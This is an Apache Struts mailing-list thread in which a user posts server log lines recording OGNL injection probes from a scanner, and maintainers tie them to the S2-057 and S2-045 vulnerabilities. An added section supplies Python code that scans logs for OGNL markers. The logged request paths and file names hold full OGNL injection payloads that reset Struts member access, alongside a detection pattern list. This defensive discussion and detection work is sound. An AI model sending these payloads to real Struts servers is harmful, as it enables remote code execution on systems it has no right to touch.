Not seen this attempt before?


Not seen this attempt before?

Greg Huber
Any ideas?

14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
200 2023 "-" "Auto Spider 1.0"

Cheers Greg

Re: Not seen this attempt before?

info@flyingfischer.ch
Possibly in this section?:
https://github.com/rapid7/metasploit-framework/issues/8064

On 20.01.19 at 13:02, Greg Huber wrote:



---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]


Re: Not seen this attempt before?

Lukasz Lenart
Sun, 20 Jan 2019 at 13:02, Greg Huber <[hidden email]> wrote:

I would say a robot is scanning the Internet to find vulnerable sites, and
it looks like it addresses the latest vulnerability with namespace
evaluation:
https://cwiki.apache.org/confluence/display/WW/S2-057


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/



Re: Not seen this attempt before?

Greg Huber
OK, thanks, good work!  Did return 500 so looks damage was done.

From the logs:
2019-01-18 18:13:33,218 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file name:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
()).(#res=@org.apache.struts2.ServletActionContext@getResponse
()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
    at
org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
~[commons-fileupload-1.4.jar:1.4]
    at
org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
~[commons-fileupload-1.4.jar:1.4]
....
....
2019-01-18 18:13:35,032 WARN
org.apache.struts2.dispatcher.mapper.DefaultActionMapper
DefaultActionMapper:cleanupMethodName -
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
,#req=@org.apache.struts2.ServletActionContext@getRequest
(),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
did not match allowed method names [a-zA-Z_]*[0-9]* - default method
execute will be used!

Cheers Greg

On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <[hidden email]> wrote:


Re: Not seen this attempt before?

Lukasz Lenart
This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
What version of Struts do you run?

Cheers
Lukasz

Sun, 20 Jan 2019 at 19:11, Greg Huber <[hidden email]> wrote:


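Detection logic a defender could run over the two kinds of lines Greg posted (the access-log request path that Łukasz tied to S2-057, and the multipart file-name WARN he tied to S2-045), as an added example that is not part of this thread or of Struts. The sample log lines are constructed (documentation IPs, shortened payload), and ACCESS_RE assumes the Apache combined log format.

```python
import re
from urllib.parse import unquote
# Constructed sample access-log lines modelled on the ones posted in the thread:
# same request shape and user agent, documentation IP, payload shortened.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [18/Jan/2019:18:13:32 +0000] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext'
    '%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a(1))'
    '%7d/index.action HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"',
    '192.0.2.10 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1" 200 2023 "-" "Auto Spider 1.0"',
    '198.51.100.7 - - [18/Jan/2019:18:20:01 +0000] "GET /orders/list.action?page=2 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]

# Constructed application-log excerpt modelled on the WARN lines in the thread:
# the multipart parser rejecting an OGNL expression sent as a file name.
SAMPLE_APP_LOG = """\
2019-01-18 18:13:33,218 WARN JakartaMultiPartRequest:parse - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: \
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#res.getWriter().print('x'))}
2019-01-18 18:14:00,001 INFO com.example.OrderAction - order 42 saved
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
INVALID_NAME_RE = re.compile(r'Invalid file name: (?P<name>.*)$', re.MULTILINE)

# Fragments of the thread's probe once decoded (%25%7b -> %{, %23 -> #); none belongs in a URL.
OGNL_MARKERS = ("%{", "#_memberAccess", "@ognl.OgnlContext", "DEFAULT_MEMBER_ACCESS",
                "ServletActionContext", "setMemberAccess", "OgnlUtil")

def fully_decode(value, max_rounds=3):
    """URL-decode to a fixed point; the thread's probe is double-encoded (%25%7b)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def ognl_markers(text):
    """Markers present in the decoded text, in OGNL_MARKERS order (empty = clean)."""
    decoded = fully_decode(text)
    return [marker for marker in OGNL_MARKERS if marker in decoded]

def scan_access_log(lines):
    """Flag requests whose path carries OGNL (the S2-057-style namespace probe)."""
    hits = []
    for m in filter(None, map(ACCESS_RE.match, lines)):
        found = ognl_markers(m["path"])
        if found:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "ua": m["ua"], "vector": "request path", "markers": found})
    return hits

def scan_app_log(text):
    """Flag rejected multipart file names that carry OGNL (the S2-045-style probe)."""
    return [{"vector": "multipart file name", "markers": found}
            for m in INVALID_NAME_RE.finditer(text) if (found := ognl_markers(m["name"]))]
```

The HTTP status alone does not tell you whether the expression was evaluated; the probe in the thread tries to add an `eresult` header or print `struts2_security_check` into the response, so a captured response is what settles it.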


Re: Not seen this attempt before?

Greg Huber
Always on the latest. There was a typo in my reply, sorry :-)

....OK, thanks, good work!  Did return 500 so looks LIKE NO damage was done.

On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <[hidden email]> wrote:


Re: Not seen this attempt before?

Lukasz Lenart
Yes, that's ok.

Tue, 22 Jan 2019 at 09:58, Greg Huber <[hidden email]> wrote:

